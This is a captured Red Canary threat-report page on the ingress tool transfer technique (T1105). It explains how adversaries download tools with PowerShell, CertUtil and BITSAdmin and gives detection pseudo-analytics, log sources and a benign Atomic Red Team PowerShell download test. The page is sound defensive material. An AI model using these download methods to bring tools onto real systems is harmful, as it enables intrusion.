redcanary.com
Open in
urlscan Pro
104.198.136.223
Public Scan
Submitted URL: https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/%22%7D
Effective URL: https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
Submission: On December 16 via api from US — Scanned from DE
Effective URL: https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
Submission: On December 16 via api from US — Scanned from DE
Form analysis 1 forms found in the DOM
GET https://redcanary.com/
<form method="get" class="search-form" action="https://redcanary.com/" __bizdiag="115" __biza="WJ__"> <svg width="20" height="19" viewBox="0 0 20 19" fill="none" xmlns="http://www.w3.org/2000/svg">
<line x1="12.8839" y1="12.1161" x2="18.8839" y2="18.1161" stroke="black" stroke-width="2.5"></line>
<circle cx="7.5" cy="7.5" r="6.25" stroke="black" stroke-width="2.5"></circle>
</svg> <input id="input-search" class="search-input" name="s" type="text" placeholder="Search" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"> <input type="submit" class="search-btn" value="Search"></form>Text Content
Skip Navigation
2022 MITRE Engenuity ATT&CK® MDR Evaluations are live See the results
Get a Demo
2022Threat Detection Report
Demo
* Trends
* Threats
* Techniques
* Beats
* Archive
* Download Report
* 2022 Threat Detection Report PDF
* 2022 Executive Summary PDF
* Intro
* Past Reports
* Threats
* Techniques
* Introduction
* Ransomware
* Supply Chain Compromises
* Vulnerabilities
* Affiliates
* Crypters-as-a-Service
* Common Webshells
* User-Initiated Initial Access
* Malicious macOS Installers
* Remote Monitoring and Management Abuse
* Linux Coinminers
* Abusing Remote Procedure Calls
* Defense Validation and Testing
* Top Threats
* Rose Flamingo
* Silver Sparrow
* Bazar
* Latent Threats
* Cobalt Strike
* Impacket
* SocGholish
* Yellow Cockatoo
* Gootkit
* BloodHound
* Top Techniques
* Command and Scripting Interpreter
* Signed Binary Proxy Execution
* Windows Management Instrumentation
* OS Credential Dumping
* Ingress Tool Transfer
* Process Injection
* Scheduled Task/Job
* Obfuscated Files or Information
* Masquerading
* Hijack Execution Flow
* Impair Defenses
* Managed Detection and Response
* Integrations
* The Red Canary Difference
* Get a Demo
Named a leader in MDR
* Atomic Red Team™
* MDR Everywhere
* MDR for Microsoft
* Active Remediation
* Replace your MSSP
* Post-Breach Response
* EDR Deployment
* EDR Migration
* Linux Security
* View All Resources
* Blog
* Guides & Overviews
* Case Studies
* Videos
* Webinars
* Events
* Customer Help Center
Blog
Sharpen your skills with the latest information, security articles, and
insights.
* Overview
* Incident Response
* Insurance & Risk
* Managed Service Providers
* Solution Providers
* Technology Partners
Red Canary Partner Connect
Apply to become a partner.
* About Us
* News & Press
* Careers - We're Hiring!
* Contact Us
* Trust Center and Security
Contact Us
How can we help you? Reach out to our team and we'll get in touch.
* Liner Notes
* Side 1: Trends
* Side 2: Threats
* Bonus Tracks: Techniques
* Trends
Trends
* Introduction
* Ransomware
* Supply Chain Compromises
* Vulnerabilities
* Affiliates
* Crypters-as-a-Service
* Common Web Shells
* User-Initiated Initial Access
* Malicious macOS Installers
* Remote Monitoring and Management Abuse
* Linux coinminers
* Abusing remote procedure calls
* Defense validation and testing
* Threats
Threats
* Top Threats
* Rose Flamingo
* Silver Sparrow
* Bazar
* Latent threats
* Cobalt Strike
* Impacket
* SocGholish
* Yellow Cockatoo
* Gootkit
* BloodHound
* Techniques
Techniques
* Top Techniques
* Command and Scripting Interpreter
* Signed Binary Proxy Execution
* Windows Management Instrumentation
* OS Credential Dumping
* Ingress Tool Transfer
* Process Injection
* Scheduled Task/Job
* Obfuscated Files or Information
* Masquerading
* Hijack Execution Flow
* Impair Defenses
* Beats
* Archive
* Download Report
Download Report
* 2022 Threat Detection Report PDF
* 2022 Executive Summary PDF
Share
TECHNIQUE T1105
INGRESS TOOL TRANSFER
The process for an adversary bringing their own tools into an environment is
known as ingress tool transfer, and it’s a perennial mainstay in our annual
ATT&CK technique rankings.
Pairs with this song
#5
TECHNIQUE RANK
20.4%
PERCENT OF CUSTOMERS AFFECTED
1,256
TOTAL THREAT VOLUME
* Analysis
* Visibility
* Collection
* Detection
* Testing
THREAT SOUNDS
Like Dylan going electric, some adversaries pivot from “living-off-the-land”
techniques and drop their own tools on a victim system.
ANALYSIS
WHY DO ADVERSARIES USE INGRESS TOOL TRANSFER?
Note: Ingress Tool Transfer has no sub-techniques.
Administrative tooling and other native operating system binaries offer
adversaries a rich array of functionalities that are ripe for abuse. While an
adversary can accomplish many of their objectives by living off the land, they
often require non-native tooling to perform post-exploitation activity and
accomplish their goals. The process for bringing their own tools into an
environment is known as ingress tool transfer.
HOW DO ADVERSARIES USE INGRESS TOOL TRANSFER?
One way to organize the many variations on ingress tool transfer is to split the
activity into two distinct but broad categories:
* transferral via native Windows binaries
* transferral via third-party tooling
Many native system binaries enable adversaries to make external network
connections and download executables, scripts, and other binaries. In fact, we
observe adversaries leveraging native system binaries to perform ingress tool
transfer far more often than not. This is a major part of the reason that we
commonly observe the Ingress Tool Transfer technique in tandem with other ATT&CK
techniques. As such, we’ll spend the bulk of this section explaining how
adversaries abuse legitimate executables for ingress tool transfer.
However, we’ll start with a brief examination of non-native software that
adversaries use to transfer tools—hopefully setting the stage for why native
tooling is an appealing choice. Almost all command and control (C2) frameworks
provide support for uploading and downloading files. Despite this, adversaries
frequently choose to abuse native binaries to retrieve additional tools and
payloads. There are many nuanced reasons why an adversary might choose a system
binary over a C2 functionality, but it mostly boils down to blending in. For
example, while it might be highly suspicious for a C2-related process to reach
out to an external network address and pull down a binary, it could be
completely normal for a legitimate system process to do the same.
Beyond C2 tools, it’s not unusual to see adversaries using remote monitoring and
management (RMM) tools to perform ingress tool transfer. RMM software can be
problematic for an adversary though, as defenders can simply block the use of
tools that aren’t permitted in their environment, which is precisely why
adversaries often resort to renaming such tools.
PowerShell is, by a wide margin, the system binary that we detect adversaries
leveraging most frequently for ingress tool transfer. Some other common culprits
include BITSAdmin, CertUtil, cURL, Wget, WScript, and CScript.
Another native system binary commonly abused by adversaries is BITSAdmin.
BITSAdmin is a utility that manages BITS jobs (Windows Background Intelligent
Transfer Service), primarily for the purpose of downloading Windows Updates, but
adversaries use it to download arbitrary files.
The LOLBAS project is a great resource and searchable database that’s mapped to
ATT&CK and documents native binaries, scripts, and libraries that adversaries
abuse. You can examine a full list of binaries that are used for ingress tool
transfer here.
VISIBILITY
Note: The visibility sections in this report are mapped to MITRE ATT&CK data
sources and components.
Nearly any attack involves some level of ingress tool transfer, so it’s
critically important that you have the telemetry necessary to observe and detect
it. Luckily, there’s no shortage of data sources offering visibility into this
technique, and many of the data sources below can be drawn out of EDR and other
widely available security tools.
PROCESS MONITORING
Since ingress tool transfer typically involves the use of system processes,
process monitoring is among the most important data sources for detecting it.
However, unless you’re looking for known malicious or banned processes, you’ll
want to build your detection analytics such that process names are supplemented
by command-line arguments, file modifications, DLL module loads, and network
connections.
COMMAND-LINE MONITORING
As is almost always the case, command-line arguments are among the best
telemetry for observing and detecting adversaries loading malicious tools into
your environment, particularly when used in concert with process monitoring and
other data sources. Beyond detection, command lines may also serve as a pivotal
point for investigation, especially in cases where something like a PowerShell
or cURL command line includes URLs used to host remote content for download and
execution.
NETWORK CONNECTIONS
Network connection telemetry is a great source of enrichment data for detecting
ingress tool transfer. While network connections offer fleeting value on their
own, they’re extremely valuable in combination with process and command-line
monitoring. Almost by definition, if you’re dealing with an adversary who is
performing ingress tool transfer, an external network connection is happening
somewhere.
COLLECTION
Note: The collection sections of this report showcase specific log sources from
Windows events, Sysmon, and elsewhere that you can use to collect relevant
security information.
SYSMON EVENT ID 1: PROCESS CREATION
The process creation event offers a wealth of information that security teams
can use for detection, specifically via the following fields:
* ProcessId
* ProcessGuid
* Image
* Commandline
* CurrentDirectory
* ParentProcessGuid
* ParentProcessId
* ParentCommandLine
As is the case with a commercial EDR product, we can leverage the above to
identify what process executed, the process that spawned it, and the commands or
arguments that executed in conjunction with it.
SYSMON EVENT ID 3: NETWORK CONNECTION
Though they are disabled by default, network connection events offer a variety
of log data that you can use to investigate or detect suspicious ingress tool
transfers. While network connections aren’t particularly useful on their own,
they’re useful in conjunction with other data, and Event ID 3 collects all of
the following:
* ProcessGuid
* ProcessId
* Image
* Protocol
* SourceIP
* DestinationIP
* DestinationHostname
* DestinationPort
SYSMON EVENT ID 11: FILE CREATE
By definition, ingress tool transfers require the creation of files on an
endpoint, and file creation events are populated whenever a file is created or
overwritten. Since processes constantly create temp files during normal
activity, Event ID 11 can be incredibly noisy without thoughtful tuning.
However, you can use Event ID 11 to track the file creation history of processes
that adversaries frequently abuse (like those listed in the analysis section
above). Consider limiting collection to oft-abused processes, directories where
adversaries tend to drop malware (AppData\Temp or C:\Users\Public, for example),
or specific file extension types like image files, executables, DLLs, and
scripts. Event fields of interest are:
* ProcessId
* ProcessGuid
* Image
* TargetFileName
SYSMON EVENT ID 22: DNS EVENT
This is a newer event in Sysmon, but it can provide useful visibility into
systems that may be communicating with C2 servers. According to Microsoft, this
event will create a log whenever a process executes a DNS query, regardless of
whether it succeeds or fails, cached or not. Logs from Event ID 22 offer
additional network telemetry that can be incredibly useful in conjunction with
the Event ID 3 logs listed above:
* ProcessGuid
* ProcessId
* QueryName
* QueryStatus
* QueryResult
* Image
WINDOWS SECURITY EVENT ID 4688: PROCESS CREATION
Process Creation (4688) events with command-line argument logging enabled is a
great native source of telemetry for observing ingress tool transfer. A good
understanding of baseline process relationships in your environment will help
combat potential false positive alerts.
DETECTION
We have 65 distinct detection analytics mapped to Ingress Tool Transfer,
offering defense in depth against this technique. Some of these analytics look
for high-impact, low-prevalence threats and rarely generate events, but there
are a few relatively simple ones that can offer great value with little effort.
Note: These detection analytics may require tuning.
SUSPICIOUS POWERSHELL COMMANDS
As we explained in the analysis section, adversaries leverage PowerShell for
ingress tool transfer more than any other tool. As such, monitoring for
PowerShell process execution in conjunction with suspicious PowerShell commands
in the command line can be a fruitful way to detect malicious ingress tool
transfers. The following pseudo-analytic is derived from several Red Canary
detectors that collectively triggered on 1,000 confirmed malicious,
high-severity threats in 2021 alone:
process == powershell.exe
&&
command_line_includes ('downloadstring' || 'downloadata' || 'downloadfile')
If you want to test your ability to operationalize the above detection analytic,
try running either of the following Atomic Red Team tests:
* T1105 atomic test #10: PowerShell Download
* T1105 atomic test #15: File Download via PowerShell
CERTUTIL DOWNLOADING MALICIOUS BINARIES
Adversaries often bypass security controls by using the Windows Certificate
Utility (certutil.exe) to download malicious code. In general, they leverage
certutil.exe along with the -split command-line option. We’ve observed this
behavior firsthand in detections associated with TA551, while other researchers
have tied it to trojans like Astaroth as well. The following detection logic
should catch this variety of ingress tool transfer:
process == certutil.exe
&&
command_line_includes ('urlcache' && 'split')
If you want to test your ability to operationalize the above detection analytic,
try running either of the following Atomic Red Team tests:
* T1105: atomic test #7: CertUtil download (urlcache)
* T1105 atomic test #8: CertUtil download (verifyctl)
BITSADMIN DOWNLOADING MALICIOUS BINARIES
As we explained in the analysis section, it’s not unusual for adversaries,
including ones who peddle ransomware, to use BITSAdmin to download arbitrary
files from the internet in an effort to evade application blocklisting. The
following analytic will look for the execution of bitsadmin.exe with command
options that suggest a file is being downloaded:
process== bitsadmin.exe
&&
command_line_includes (download' || 'transfer')
If you want to test your ability to operationalize the above detection analytic,
try running the following Atomic Red Team test:
* T1105 atomic test #9: BITSAdmin BITS Download
WEEDING OUT FALSE POSITIVES
The majority of the telemetry patterns above can also manifest in development
pipelines and system management tools. Given this, baselining is highly
recommended due to the volume some sources will provide. Additionally, you may
want to do an environment audit and figure out if these potentially suspicious
behaviors are being employed by any legitimate tools or people in your
environment. Once you understand legitimate use cases, you can tune those out as
exceptions and focus your detection efforts on seeking out behaviors that are
more likely to represent malicious instances of ingress tool transfer.
TESTING
Start testing your defenses against Ingress Tool Transfer using Atomic Red
Team—an open source testing framework of small, highly portable detection tests
mapped to MITRE ATT&CK.
GETTING STARTED
View atomic tests for T1105: Ingress Tool Transfer. In most environments, these
should be sufficient to generate a useful signal for defenders.
RUN THIS TEST ON A WINDOWS SYSTEM USING POWERSHELL:
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt
What to expect
The above test will download a file to LICENSE.txt and display it with
notepad.exe. For safety purposes, the command only downloads and displays text
rather than downloading and executing executable content.
USEFUL TELEMETRY WILL INCLUDE:
VisibilityTelemetryCollectionVisibility :
Process monitoring
Telemetry:
A powershell.exe and notepad.exe process will start.
Collection :
EDR, Sysmon Events ID 1, and Windows Event ID 4688 should collect relevant
telemetry.
Visibility :
Command monitoring
Telemetry:
Command-line logging will capture the context of what is executed.
Collection :
EDR, Sysmon Event ID 1, and Windows Event ID 4688 should collect relevant
telemetry.
Visibility :
Network monitoring
Telemetry:
A connection to
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
is made.
Collection :
EDR and Sysmon Event IDs 3 and 22 should collect relevant telemetry.
Visibility :
File monitoring
Telemetry:
powershell.exe will write LICENSE.txt to the current directory.
Collection :
EDR and Sysmon Event ID 11 should collect relevant telemetry.
REVIEW AND REPEAT
Now that you have executed one or several common tests and checked for the
expected results, it’s useful to answer some immediate questions:
* Were any of your actions detected?
* Were any of your actions blocked or prevented?
* Were your actions visible in logs or other defensive telemetry?
Repeat this process, performing additional tests related to this technique. You
can also create and contribute tests of your own.
LSASS Memory
Process Injection
SEE WHAT IT'S LIKE TO HAVE A SECURITY ALLY.
EXPERIENCE THE DIFFERENCE BETWEEN A SENSE OF SECURITY AND ACTUAL SECURITY.
Get a Demo
*
*
*
* What We Do
* Managed Detection and Response
* Integrations
* The Red Canary Difference
* Get a Demo
* Solutions
* Atomic Red Team™
* MDR Everywhere
* MDR for Microsoft
* Active Remediation
* Replace your MSSP
* Post-Breach Response
* EDR Deployment
* EDR Migration
* Linux Security
* Alert Triage
* Resources
* View all Resources
* Blog
* Guides & Overviews
* Case Studies
* Videos
* Webinars
* Events
* Customer Help Center
* Newsletter
* Partners
* Overview
* Incident Response
* Insurance & Risk
* Managed Service Providers
* Solution Providers
* Technology Partners
* Apply to Become a Partner
* Company
* About Us
* News & Press
* Careers – We’re Hiring!
* Contact Us
* Trust Center and Security
© 2014-2022 Red Canary. All rights reserved. info@redcanary.com +1 855-977-0686
Privacy Policy Trust Center and Security
Our website uses cookies to provide you with a better browsing experience. More
information can be found in our Privacy Policy.
X
Privacy & Cookies Policy
Close
PRIVACY OVERVIEW
This website uses cookies to improve your experience while you navigate through
the website. Out of these cookies, the cookies that are categorized as necessary
are stored on your browser as they are essential for the working of basic
functionalities...
Necessary
Necessary
Always Enabled
Necessary cookies are absolutely essential for the website to function properly.
This category only includes cookies that ensures basic functionalities and
security features of the website. These cookies do not store any personal
information.
Non-necessary
Non-necessary
Any cookies that may not be particularly necessary for the website to function
and is used specifically to collect user personal data via analytics, ads, other
embedded contents are termed as non-necessary cookies. It is mandatory to
procure user consent prior to running these cookies on your website.
SAVE & ACCEPT
Back to Top